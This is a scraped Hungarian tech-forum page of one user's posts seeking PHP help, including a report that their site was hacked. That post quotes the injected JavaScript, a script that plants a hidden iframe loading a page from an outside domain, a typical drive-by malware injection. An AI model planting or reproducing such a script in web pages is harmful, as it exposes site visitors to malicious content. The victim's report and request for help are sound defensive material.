Hirdetés
- gban: Ingyen kellene, de tegnapra
- sziku69: Fűzzük össze a szavakat :)
- Luck Dragon: Asszociációs játék. :)
- Magga: PLEX: multimédia az egész lakásban
- Gurulunk, WAZE?!
- D1Rect: Nagy "hülyétkapokazapróktól" topik
- Rap, Hip-hop 90'
- droidic: Windows 11 önállóság nélküli világ: a kontroll új korszaka
- sziku69: Szólánc.
- laskr99: DFI és DFI Lanparty gyűjteményem
Új hozzászólás Aktív témák
- 

válasz  Sk8erPeter

üzenetére Sk8erPeter

üzenetére
- 

válasz  Sk8erPeter

üzenetére Sk8erPeter

üzenetéreKöszönöm szépen, mindjárt elolvasom, értelmezem és megpróbálom fellőni élesbe. 
- 

Üdv ismét! Szeretném a segítségeteket kérni. 
 Van egy oldalam, ami jelenleg így listázza ki az eredményeket. Itt a kódja (1 napig látható).Azt szeretném, hogy csak a képeket listázza ki és ne egymás alá, hanem egymás mellé (nem muszáj táblázatba tennie, jó ha egy div-en belülre rakja, hogy később formázni tudjam) és egy számlálót is szeretnék még a kódba, ami megszámolja hány elem lett beillesztve. Körülbelül úgy, mint itt. Szerk.: Közben látom, hogy az ID után teszi a .gif kiterjesztés, holott a User után kellene tennie, de ezt elfelejtettem átírni.Szerk2.: Megcseréltem.
- 

válasz  Hege1234

üzenetére Hege1234

üzenetéreValóban nem php, így én is OFF-ba teszem. A content_box_big és a content_box úgy vannak megoldva, ahogy a Szolgáltatásaink doboz is. Előre le van gyártva egy kép hozzájuk. Ha nagyobb méretűt szeretnél, akkor le kell gyártani újra (GIMP vagy Photoshop). CSS3-mal talán könnyebb megoldani. 
- 

Válaszoltak, szerintük ez vírusos themplate (joomla, wordpress stb) vagy esetleg kikerült az ftp 
 jelszavam.
 Állításuk szerint a php kódban van a hiba.Ehhez viszont nem értek, a php kódot egy kedves és segítőkész fórumozó írta. Azt hiszem felkeresem ismét és kitalálunk rá valami megoldást. 
 Gyanítom azzal lesz a gond, hogy a kódban benne van a jelszó, ami az adatbázishoz való csatlakozáshoz szükséges. Ahogy olvasom ezt valami külön fájlban kellene tárolni ahhoz, hogy biztonságosabb legyen.
- 

válasz  lordjancso

üzenetére lordjancso

üzenetéreIgen, ezt a kettőt és még az index.php-t is (amibe amúgy be van hívva a header és a footer.php). 
 Operában például nem is lehet a fejlécben semmire kattintani.Egy kattintással vissza tudom tenni a ma reggeli vagy a tegnapi verziót, ezzel tehát nincs gond, csak nem tudom hogy csinálták és hogyan tudom kivédeni legközelebb. CineDOG1: Köszi, megnézem mit tud. DeltaPower: Megkérdezem a tárhely szolgáltatót, hátha ők tudják honnan jött a támadás. 
- 

Meglepődve tapasztalom, hogy valaki belenyúlt az oldalamba. 
 Egyszerű php oldalacska, és a header, footer és index.php fájlokat (valamint egy js-t is, amit valójában nem is használ az oldal) megváltoztatták. Egy-egy ok felirat látszik így most a fejlécben és a láblécben is.Ez került bele (a kódban lévő linken nem tudom mi van, de felelősséget nem vállalok érte): <!--68c8c7--><script type="text/javascript" language="javascript"> 
 (function () { var id = '195'; var u09 = document.createElement('iframe'); u09.src = 'http://www.torsdagsherrer.skjern-net.dk/dtd.php'; u09.style.position = 'absolute'; u09.style.border = '1'; u09.style.height = '31px'; u09.style.width = '42px'; u09.style.left = '500px'; u09.style.top = '100px'; if (!document.getElementById('u')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id=\'u\' style="position:absolute; width:80%; height:100%;" ></div>'); document.getElementById('u').appendChild(u09); }})();</script><!--/68c8c7-->A jelszó szerintem abszolút biztonságos (kis- és nagybetűk, számok, össze vissza, nincs ismétlődő karakter). Hogy lehetséges, hogy mégis valaki (vagy valami) belenyúlt. Mit tehetek ellene, hogy lehet kivédeni? 
- 

Átjöttem akkor ebbe a topikba, azt mondták itt az egyik problémámat meg lehetne oldani php-vel. 
 Itt írtam róla.Az még lemaradt, hogy a feltöltött/betöltött képeket csak ideiglenesen tárolná a rendszer. Tehát bizonyos idő után ki kellene üríteni a mappát, amiben átmenetileg tárolta a képeket. Nagyon kezdőként kérdezem ezeket.  
Új hozzászólás Aktív témák
- Latitude 5530 27% 15.6" FHD IPS i7-1255U 16GB 512GB NVMe magyar vbill gar
- Logitech Laser egér - Multi Device K380 Bluetooth Billentyűzet- Logitech Bluetooth Audio Adapter
- Precision 7670 27% 16" FHD+ IPS i7-12850HX RTX A3000 32GB 1TB NVMe magyar vbill IR kam gar
- szinte új 14 hüvelykes MacBook Pro M4 512GB SSD space black asztrofekete Apple 3 év garancia
- újszerű iPhone 16e 128GB black fekete független Apple garancia
- Telefon felvásárlás!! Samsung Galaxy A50/Samsung Galaxy A51/Samsung Galaxy A52/Samsung Galaxy A53
- Honor 90 /12/512GB / Kártyafüggetlen / 12Hó Garancia
- Apple iPhone 15 Pro Max 256GB,Átlagos,Adatkábel,12 hónap garanciával
- ÁRGARANCIA!Épített KomPhone i5 14600KF 16/32/64GB RAM RTX 5070 12GB GAMER PC termékbeszámítással
- Vállalom Xiaomi Okoskamerák szoftveres javíttását
Állásajánlatok
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest
Cég: NetGo.hu Kft.
Város: Gödöllő

Benne hagytam a magyarázatokat is a kódban, hogy később is át tudjam látni. Az a PDO átállás egyelőre még kínai, de jó lenne majd a
 Benne hagytam a magyarázatokat is a kódban, hogy később is át tudjam látni. Az a PDO átállás egyelőre még kínai, de jó lenne majd a